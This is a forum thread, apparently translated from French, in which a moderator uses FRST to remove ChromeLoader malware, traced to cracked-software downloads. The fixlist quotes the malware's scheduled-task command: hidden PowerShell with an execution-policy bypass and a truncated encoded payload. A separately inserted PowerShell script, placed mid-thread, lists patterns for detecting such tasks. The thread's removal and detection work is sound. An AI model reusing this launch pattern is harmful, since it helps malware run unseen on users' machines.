PowerShell that closes and opens my pages.

Solved
Victor
Hello, since this morning my pages and applications are closing and reopening by themselves. I looked in my task manager and it seems that it's "Powershell" that is causing this. I thought it might be a virus, but after a full scan of my PC with Windows Defender, no threats were detected... I'm reaching out to someone who might have a solution to my problem :)

2 answers

bazfile Posted messages 58480 Registration date   Status Moderator Last intervention   20 264
 
Hello,
Download FRST. Once downloaded, save it on the desktop, then right-click on FRST and choose Run as administrator. You will have this:

Click on Scan

Be sure to wait for the messages indicating that the scan is complete


At the end of the scan, you will have two text files on the desktop: FRST and Addition.
Then send the FRST and ADDITION reports to CJOINT (see THIS TUTORIAL), then provide the two links generated by Cjoint in your response.

--
bazfile
Moderator/Security Contributor.
A hello, a response, a thank you are always appreciated.
1
Victor
 
Hello and thank you, here are the 2 reports: Addition: https://www.cjoint.com/c/LAjqFa5zYam
FRST: https://www.cjoint.com/c/LAjqFKlaH2m
0
bazfile > Victor
 
Hello,
You download and install anything, for example:
- Explosive_3.0.6_Cracked.zip
- Crack office (With eyes and wings).rar

Avoid this kind of stuff; it will only bring you problems.

Procedure to follow in the order indicated:

1- Open FRST as an administrator by right-clicking on FRST and choosing run as administrator
2 - Copy the entire script that is in the box below:
Start::
CreateRestorePoint:
CloseProcesses:
Task: {1960845C-AABF-423F-A739-4026F400D4B3} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E (data item has 4315 characters more). (No file)
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [474]
Edge Extension: (No name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3: <==== ATTENTION (Restriction - Zones)
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [ut] => "C:\Users\aston\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED (No file)
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (No file)
C:\Users\aston\Downloads\Explosive_3.0.6_Cracked.zip
C:\Users\aston\Downloads\Crack office (With eyes and wings).rar
2022-01-09 11:58 - 2022-01-09 11:58 - 000012828 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
Hosts:
EmptyTemp:
End::

3- Once the script is copied, click on Fix; FRST will automatically take the script from the clipboard.



Let the fix process complete. Once finished, you will be asked to restart your PC; do so as soon as prompted, see below.
Then, once your computer has restarted:
4- You will have a Fixlog file on your desktop; then send these reports to https://www.cjoint.com/ (see this tutorial), then provide the link generated by Cjoint in your next message.

5- CHECK AND TELL ME IF YOUR PROBLEM IS STILL PRESENT


FOR INFORMATION:

Your version of Windows 10 is not up to date. To check, go to this page and click on Update now; this will start the download of the Microsoft tool. Just open it and it will allow you to update Windows 10 to the latest version and tell you if it is compatible with your PC. Be careful, this update takes some time; if you have a laptop, plug it into the mains, as it would be a shame to run out of battery before the update is finished.
0
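A read-only check for the kind of scheduled task the fixlist above removes (the ChromeLoader task that starts powershell with -ExecutionPolicy Bypass -WindowStyle Hidden -E). This is an added example, not part of the thread or of FRST; the function name Test-SuspiciousTaskCommand, the regular expressions and the sample command line are assumptions made for illustration.

```powershell
# Added example (read-only): flag scheduled tasks that start PowerShell with
# the switches seen in the ChromeLoader task above. Nothing is changed.

# PowerShell accepts unambiguous parameter prefixes, so -E, -enc and
# -EncodedCommand are all covered; the patterns are illustrative assumptions.
$Patterns = [ordered]@{
    EncodedCommand = '(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{20,}'
    HiddenWindow   = '(?i)(?:^|\s)-w[a-z]*\s+hidden\b'
    PolicyBypass   = '(?i)(?:^|\s)-e(?:p|x[a-z]*)\s+bypass\b'
}

function Test-SuspiciousTaskCommand {
    param([string]$CommandLine)
    # Ignore actions that never reach powershell.exe / pwsh.exe.
    if ($CommandLine -notmatch '(?i)\b(?:powershell|pwsh)(?:\.exe)?\b') { return }
    foreach ($name in $Patterns.Keys) {
        if ($CommandLine -match $Patterns[$name]) { $name }
    }
}

# Constructed sample in the shape of the task line above; the base64 is a
# harmless placeholder, not the payload from the report.
$sample = 'cmd /c start /min "" powershell -ExecutionPolicy Bypass ' +
          '-WindowStyle Hidden -E QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQA='
"Sample flags: $(@(Test-SuspiciousTaskCommand $sample) -join ', ')"

# Audit the live system (Get-ScheduledTask: Windows 8 / Server 2012 or later).
$findings = foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # COM-handler actions have no command line
        $cmd  = "$($action.Execute) $($action.Arguments)"
        $hits = @(Test-SuspiciousTaskCommand $cmd)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Task    = $task.TaskPath + $task.TaskName
                Flags   = $hits -join ', '
                Score   = $hits.Count
                Command = $cmd.Substring(0, [Math]::Min(120, $cmd.Length))
            }
        }
    }
}
$findings | Sort-Object Score -Descending | Format-List
```

Run it from an elevated prompt so tasks belonging to other accounts are visible; a task that scores on all three flags deserves a closer look before anything is removed.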
Victor > bazfile
 
Here is the Fixlog link: https://www.cjoint.com/c/LAjrdWvY88m
and thank you for the information about the Windows 10 update! I will keep you posted if I see PowerShell closing pages again, but for now it seems to be working fine.
0
bazfile > Victor
 
The fixlog is OK, it should normally be fine.
1
Victor
 
It looks like there are no more bugs. Thank you so much for your help!!! It's great ;)
0
bazfile
 
You can uninstall FRST: rename the FRST file you downloaded to uninstall, then, once the file is renamed, open it. The uninstallation will occur automatically via a restart of the PC.

I am marking the topic as resolved.
@+ on CCM.
0